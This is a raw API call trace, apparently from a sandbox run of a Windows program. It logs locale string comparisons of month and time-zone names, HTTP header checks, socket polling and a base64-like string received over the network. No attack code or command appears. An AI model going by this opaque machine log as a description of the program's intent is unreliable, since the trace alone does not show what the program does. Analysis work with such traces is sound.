returned 3 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRZ", cchCount2=3) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEZ", cchCount2=3) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="ENO", cchCount2=3) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FBRO", cchCount2=4) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MZO", cchCount2=3) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AB", cchCount2=2) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AGTO", cchCount2=4) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SBRE", cchCount2=4) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OBRE", cchCount2=4) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NBRE", cchCount2=4) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DBRE", cchCount2=4) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRT", cchCount2=3) returned 1 [0102.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MEI", cchCount2=3) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JANV", cchCount2=4) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉV", cchCount2=3) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MARS", cchCount2=4) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVR", cchCount2=3) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIN", cchCount2=4) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIL", cchCount2=4) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛ", cchCount2=3) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DÉC", cchCount2=3) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉVR", cchCount2=4) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUI", cchCount2=3) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛT", cchCount2=4) returned 1 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAJ", cchCount2=3) returned 1 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVG", cchCount2=3) returned 1 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="JAN", cchCount2=3) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="FEB", cchCount2=3) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="MAR", cchCount2=3) returned 2 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="A", cchCount2=1) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACDT", cchCount2=4) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACST", cchCount2=4) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACT", cchCount2=3) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ADT", cchCount2=3) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEDT", cchCount2=4) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEST", cchCount2=4) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AFT", cchCount2=3) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKDT", cchCount2=4) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKST", cchCount2=4) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0102.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ART", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWDT", cchCount2=4) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWST", cchCount2=4) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZOST", cchCount2=5) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZT", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="B", cchCount2=1) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BDT", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIOT", cchCount2=4) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIT", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BOT", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BRT", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BTT", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="C", cchCount2=1) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CAT", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CCT", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEDT", cchCount2=4) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEST", cchCount2=4) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CET", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHADT", cchCount2=5) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHAST", cchCount2=5) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHOT", cchCount2=4) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ChST", cchCount2=4) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHUT", cchCount2=4) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIST", cchCount2=4) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIT", cchCount2=3) returned 3 [0102.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CKT", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLST", cchCount2=4) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLT", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COST", cchCount2=4) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COT", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CT", cchCount2=2) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CVT", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CWST", cchCount2=4) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CXT", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="D", cchCount2=1) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="DAVT", cchCount2=4) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="DDUT", cchCount2=4) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="DFT", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="E", cchCount2=1) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EASST", cchCount2=5) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EAST", cchCount2=4) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EAT", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ECT", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ECT", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EDT", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EDT", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EEDT", cchCount2=4) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EEST", cchCount2=4) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EET", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EGST", cchCount2=4) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EGT", cchCount2=3) returned 3 [0102.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EIT", cchCount2=3) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EST", cchCount2=3) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EST", cchCount2=3) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EST", cchCount2=3) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="F", cchCount2=1) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FET", cchCount2=3) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FJT", cchCount2=3) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FKST", cchCount2=4) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FKST", cchCount2=4) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FKT", cchCount2=3) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FNT", cchCount2=3) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="G", cchCount2=1) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GALT", cchCount2=4) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GAMT", cchCount2=4) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GET", cchCount2=3) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GFT", cchCount2=3) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GILT", cchCount2=4) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GIT", cchCount2=3) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GMT", cchCount2=3) returned 2 [0102.240] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19faa8 | out: lpTimeZoneInformation=0x19faa8) returned 0x1 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Last-Modified", cchCount2=13) returned 1 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Last-Modified", cchCount2=13) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Last-Modified", cchCount2=13) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Last-Modified", cchCount2=13) returned 1 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Expires", cchCount2=7) returned 1 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Expires", cchCount2=7) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Expires", cchCount2=7) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Expires", cchCount2=7) returned 1 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="ETag", cchCount2=4) returned 1 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="ETag", cchCount2=4) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="ETag", cchCount2=4) returned 3 [0102.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="ETag", cchCount2=4) returned 1 [0102.241] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Pragma", cchCount2=6) returned 1 [0102.241] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x3f0 [0102.241] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4 [0102.241] GetCurrentThreadId () returned 0x1358 [0102.241] GetCurrentThreadId () returned 0x1358 [0102.242] GetCurrentThreadId () returned 0x1358 [0102.242] LoadStringW (in: hInstance=0x400000, uID=0xfebf, lpBuffer=0x19db68, cchBufferMax=4096 | out: lpBuffer="Chunk Started") returned 0xd [0102.242] GetTickCount64 () returned 0x115add0 [0102.242] GetTickCount64 () returned 0x115add0 [0102.242] GetTickCount64 () returned 0x115add0 [0102.242] GetTickCount64 () returned 0x115add0 [0102.243] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0102.243] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0102.243] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="CLOSE", cchCount2=5) returned 1 [0102.243] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="CLOSE", cchCount2=5) returned 1 [0102.243] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x24048b8, cbMultiByte=164, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 164 [0102.243] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x24048b8, cbMultiByte=164, lpWideCharStr=0x240690c, cchWideChar=164 | out: lpWideCharStr="MZR-afy4DVkMEyMAayNgWogyzyzIMM20F5FFBRdNJyM3jKFQVFw0Qhk3MNODDzFMJO2VCMCC1CUgM2MUT1TyKRVMCOFTCQWFhCWZWgTBVGFyaWgoMTYgTWFydCAyMDIwIFBhemFydGVzaSlfX1NhYXQoMTEtNDAtNTkp") returned 164 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () 